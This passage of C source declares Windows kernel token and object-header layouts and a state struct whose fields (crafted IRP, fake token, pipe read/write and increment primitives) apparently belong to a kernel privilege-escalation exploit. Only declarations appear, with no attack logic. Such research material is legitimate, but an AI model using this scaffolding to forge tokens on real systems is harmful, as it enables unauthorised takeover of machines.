    struct _TOKEN_SOURCE TokenSource; //0x0
    struct _LUID TokenId; //0x10
    struct _LUID AuthenticationId; //0x18
    struct _LUID ParentTokenId; //0x20
    union _LARGE_INTEGER ExpirationTime; //0x28
    struct _ERESOURCE* TokenLock; //0x30
    struct _LUID ModifiedId; //0x38
    struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
    struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
    ULONG SessionId; //0x78
    ULONG UserAndGroupCount; //0x7c
    ULONG RestrictedSidCount; //0x80
    ULONG VariableLength; //0x84
    ULONG DynamicCharged; //0x88
    ULONG DynamicAvailable; //0x8c
    ULONG DefaultOwnerIndex; //0x90
    struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
    struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
    VOID* PrimaryGroup; //0xa8
    ULONG* DynamicPart; //0xb0
    struct _ACL* DefaultDacl; //0xb8
    enum _TOKEN_TYPE TokenType; //0xc0
    enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
    ULONG TokenFlags; //0xc8
    UCHAR TokenInUse; //0xcc
    ULONG IntegrityLevelIndex; //0xd0
    ULONG MandatoryPolicy; //0xd4
    void* LogonSession; //0xd8
    struct _LUID OriginatingLogonSession; //0xe0
    struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
    struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
    struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; //0x308
    VOID* Package; //0x310
    struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
    ULONG CapabilityCount; //0x320
    struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
    struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
    struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes; //0x448
    VOID* TrustLevelSid; //0x450
    struct _TOKEN* TrustLinkedToken; //0x458
    VOID* IntegrityLevelSidValue; //0x460
    struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
    struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
    struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
    struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
    VOID* SessionObject; //0x488
    ULONGLONG VariablePart; //0x490
};
|
|
|
|
//0x38 bytes (sizeof)
// Object-manager header specialised for token objects: Body at 0x30 is
// declared as a full struct _TOKEN rather than the generic QUAD the kernel
// uses, so sizeof(_OBJECT_HEADER) is 0x30 + sizeof(_TOKEN), not the 0x38
// the annotation above states (that figure covers the header alone).
struct _OBJECT_HEADER
{
    LONGLONG PointerCount; //0x0
    union
    {
        LONGLONG HandleCount; //0x8
        VOID* NextToFree; //0x8
    };
    struct _EX_PUSH_LOCK Lock; //0x10
    UCHAR TypeIndex; //0x18
    union
    {
        UCHAR TraceFlags; //0x19
        struct
        {
            UCHAR DbgRefTrace : 1; //0x19
            UCHAR DbgTracePermanent : 1; //0x19
        };
    };
    UCHAR InfoMask; //0x1a
    union
    {
        UCHAR Flags; //0x1b
        struct
        {
            UCHAR NewObject : 1; //0x1b
            UCHAR KernelObject : 1; //0x1b
            UCHAR KernelOnlyAccess : 1; //0x1b
            UCHAR ExclusiveObject : 1; //0x1b
            UCHAR PermanentObject : 1; //0x1b
            UCHAR DefaultSecurityQuota : 1; //0x1b
            UCHAR SingleHandleEntry : 1; //0x1b
            UCHAR DeletedInline : 1; //0x1b
        };
    };
    ULONG Reserved; //0x1c
    union
    {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
        VOID* QuotaBlockCharged; //0x20
    };
    VOID* SecurityDescriptor; //0x28
    struct _TOKEN Body; //0x30
};
|
|
|
|
// Working-state bag shared by the rest of the program: user-mode buffers,
// pointers typed as the kernel structures declared above, and the pipe,
// file and token handles it holds open. How each field is populated or
// consumed is not visible in this chunk; the names are the only contract.
// The token-related pointers (TokenLock, pSecurityAttributes, TokenSidValues,
// LogonSession, fakeToken) use the same types as the corresponding _TOKEN
// fields, except LogonSession, which _TOKEN declares as void*.
// Ownership note: nothing here records which handles must be closed; the
// code that fills this struct is responsible for that.
struct mm {
    void* fake_data_entry;
    void* input;
    _IRP* crafted_irp;
    IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
    void* p_mem_0x30;
    void* p_mem_0xD0_2;
    _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
    ACL* VariablePartDefaultDacl;
    ACL* VariablePartDefaultDacl2;
    _ERESOURCE* TokenLock;
    void* PrimaryGroup;
    int sizeOfClientTokenAndObjectHeader;
    PSEP_SID_VALUES_BLOCK TokenSidValues;
    _SECURITY_CLIENT_CONTEXT* security_client_context;
    _SEP_LOGON_SESSION_REFERENCES* LogonSession;
    _TOKEN* fakeToken;
    void *pipe_100_im_control_block;
    void* pipe_100_rw_control_block;
    void* p_mem_Pipe_hToPipe_1000_rw;
    void* p_mem_Pipe_hToPipe_1000_rw_2;
    HANDLE hPipeIM;
    HANDLE hPipeRW;
    HANDLE hFileIM;
    HANDLE hFileRW;
    HANDLE IncPrimitiveTOKEN;
    HANDLE RWPrimitiveTOKEN;
};
|
|
|
|
//0x18 bytes (sizeof)
|
|
struct _DISPATCHER_HEADER
|
|
{
|
|
union
|
|
{
|
|
volatile LONG Lock; //0x0
|
|
LONG LockNV; //0x0
|
|
struct
|
|
{
|
|
UCHAR Type; //0x0
|
|
UCHAR Signalling; //0x1
|
|
UCHAR Size; //0x2
|
|
UCHAR Reserved1; //0x3
|
|
};
|
|
struct
|
|
{
|
|
UCHAR TimerType; //0x0
|
|
union
|
|
{
|
|
UCHAR TimerControlFlags; //0x1
|
|
struct
|
|
{
|
|
UCHAR Absolute : 1; |